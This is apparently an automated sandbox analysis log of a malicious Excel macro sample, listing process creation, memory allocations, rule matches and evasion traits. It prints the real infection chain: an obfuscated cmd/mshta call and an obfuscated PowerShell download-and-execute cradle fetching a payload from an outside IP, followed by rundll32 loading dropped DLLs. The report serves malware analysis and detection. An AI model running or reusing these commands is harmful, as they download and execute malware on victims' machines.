                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002EDBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002E8BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002E6DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002DDFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002E9BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002D9DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002DE5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002D2BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002E7DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B0F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B0E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B0AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B070B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B120BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B0EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B0F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B0EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B11889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B1DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B0AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B064E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B04EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B1A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B19EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B0D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B1DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B15CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B0B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B166CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B0E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B1C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B1AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B1F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B07C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B20E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B1AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B03C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B03E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B1BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B09011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B04816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B20C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B10001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B18606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B1907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B05E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B1A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B1AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B02051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B02251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B10E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B20056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B01A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B04C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B16C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B1044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B209B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B081B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B051BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B1C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B17BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B213AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B1E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B09B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B14B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B1D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B07FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B059F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B0DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B16DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B195FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B18BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B1DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B17DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B02BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B19BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B09DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B0E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B20F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B07735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B1473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B08B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B1BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B06D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B09714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B14116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B18519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B10B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B0BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B05361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B08969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B1176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B12550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B1CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B0A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B04346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B0CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B05548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B1894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00B0B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003BA03A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003A323F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003A303C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003C023A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003BBA31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003B9E30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003A7037
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003BE835
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003BB227
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003C0014
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003A8411
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003A3C16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003AF401
                            Source: 4B14.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                            Source: 364453688149503140239183.xlsMacro extractor: Sheet name: GODVIN
                            Source: 364453688149503140239183.xlsMacro extractor: Sheet name: GODVIN
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002DE249 DeleteService,
                            Source: 364453688149503140239183.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Users\user\Desktop\364453688149503140239183.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Bwqooqqzlaw\Jump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10032B38 appears 108 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100201F1 appears 34 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100200FD appears 72 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D27 appears 288 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1001F9FC appears 52 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D5A appears 82 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100359C1 appears 46 times
                            Source: 364453688149503140239183.xlsOLE indicator, VBA macros: true
                            Source: 364453688149503140239183.xls.0.drOLE indicator, VBA macros: true
                            Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@25/9@1/47
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                            Source: 364453688149503140239183.xlsOLE indicator, Workbook stream: true
                            Source: 364453688149503140239183.xls.0.drOLE indicator, Workbook stream: true
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc,
                            Source: 364453688149503140239183.xlsReversingLabs: Detection: 18%
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K........l.............................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................../,k....................................}..v............0...............................h...............
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................../,k..... ..............................}..v....h.......0.................l.............h...............
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................P.,k....................................}..v............0...............................h...............
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................P.,k....x.l.............................}..v....8.......0.................l.............h...............
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#.................,k....................................}..v....P.......0...............................h...............
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#.................,k....(.l.............................}..v............0.................l.............h...............
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'.................,k....E...............................}..v.....k......0...............x.l.............h...............
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+.................,k....E...............................}..v............0...............x.l.............h...............
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0...............H.#.....:.......h...............
                            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/vvv/ppp/fe.html
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",OOkfVaPZ
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",xvIpPUnGjiWnFD
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",mYtMYmZ
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",DllRegisterServer
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/vvv/ppp/fe.html
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",OOkfVaPZ
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",xvIpPUnGjiWnFD
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",mYtMYmZ
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",DllRegisterServer
                            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE7DE.tmpJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                            Source: 4B14.tmp.0.drInitial sample: OLE indicators vbamacros = False

                            Data Obfuscation

                            barindex
                            Obfuscated command line found
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_039408D2 push 8B490321h; iretd
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_039400BB push 8B490321h; iretd
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_039408D2 push 8B490321h; iretd
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_039400BB push 8B490321h; iretd
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10032B7D push ecx; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030DFF push ecx; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10032B7D push ecx; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10030DFF push ecx; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003C0C04 push ss; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003C0F14 push FFFFFFF8h; retf
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,
                            Source: QWER.dll.6.drStatic PE information: real checksum: 0x8df98 should be: 0x9432d
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\QWER.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz (copy)Jump to dropped file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\QWER.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz (copy)Jump to dropped file

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Hides that the sample has been downloaded from the Internet (zone.identifier)
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz:Zone.Identifier read attributes | delete
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm:Zone.Identifier read attributes | delete
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx:Zone.Identifier read attributes | delete
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100134F0 IsIconic,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100134F0 IsIconic,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
